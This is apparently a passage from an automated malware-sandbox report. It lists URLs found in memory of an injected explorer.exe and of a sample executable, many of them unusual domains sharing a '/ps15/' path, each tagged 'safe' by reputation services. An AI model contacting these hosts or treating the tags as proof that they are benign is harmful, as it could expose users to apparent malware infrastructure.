http://www.thepeacedealers.com/ps15/ | explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://excel.office.com | explorer.exe, 0000000C.00000000.1315888639.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3744784252.000000000C091000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar- | explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.trezorsuite.net | explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.gmgex1.com/ps15/www.passrmale.com | explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ellipsive.com/ps15/ | explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.gomenasorry.com/ps15/www.briefout.cloud | explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.gomenasorry.com/ps15/ | explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ellipsive.com/ps15/www.mayson-wedding.com | explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.thepeacedealers.com | explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc | explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.kaidifeiniroo.netReferer: | explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wns.windows.com/ | explorer.exe, 0000000C.00000000.1312007503.00000000090F2000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fashiontrendshub.xyzReferer: | explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | xU0wdBC6XWRZ6UY.exe, 00000003.00000002.1297010966.00000000033E1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.plasoi.xyz/ps15/www.stdaev.com | explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.resmierabaru20.shop/ps15/ | explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.gmgex1.com | explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.autoitscript.com/autoit3/J | explorer.exe, 0000000C.00000000.1315888639.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2275065911.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271546398.000000000C3FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077197592.000000000C42C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748567632.000000000C428000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2274367081.000000000C41F000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.trezorsuite.net/ps15/www.gomenasorry.com | explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.passrmale.com/ps15/ | explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://word.office.com | explorer.exe, 0000000C.00000000.1315888639.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3744784252.000000000C091000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.seraphmovement.com/ps15/ | explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.resmierabaru20.shop | explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark | explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.thepeacedealers.com/ps15/www.casinomaxnodepositbonus.icu | explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.casinomaxnodepositbonus.icu/ps15/www.33pgaaa.com | explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmp | false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.seraphmovement.com/ps15/www.fashiontrendshub.xyzexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://outlook.comexplorer.exe, 0000000C.00000000.1315888639.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3744784252.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.passrmale.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.33pgaaa.com/ps15/explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.casinomaxnodepositbonus.icuexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://android.notify.windows.com/iOSexplorer.exe, 0000000C.00000003.2271650261.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1312007503.000000000913F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 0000000C.00000000.1312007503.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.stdaev.com/ps15/www.seraphmovement.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.mayson-wedding.com/ps15/explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000000C.00000002.3741055942.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1312007503.0000000008F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.gomenasorry.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://www.ellipsive.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.pollensense.com/explorer.exe, 0000000C.00000000.1308477475.00000000071B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.33pgaaa.comReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.briefout.cloudReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.mayson-wedding.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.kaidifeiniroo.net/ps15/www.plasoi.xyzexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fashiontrendshub.xyzexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.briefout.cloud/ps15/www.kaidifeiniroo.netexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://schemas.microexplorer.exe, 0000000C.00000000.1311534834.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1311557126.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.3738832346.0000000007C70000.00000002.00000001.00040000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.seraphmovement.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.kaidifeiniroo.net/ps15/explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.33pgaaa.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.plasoi.xyzReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
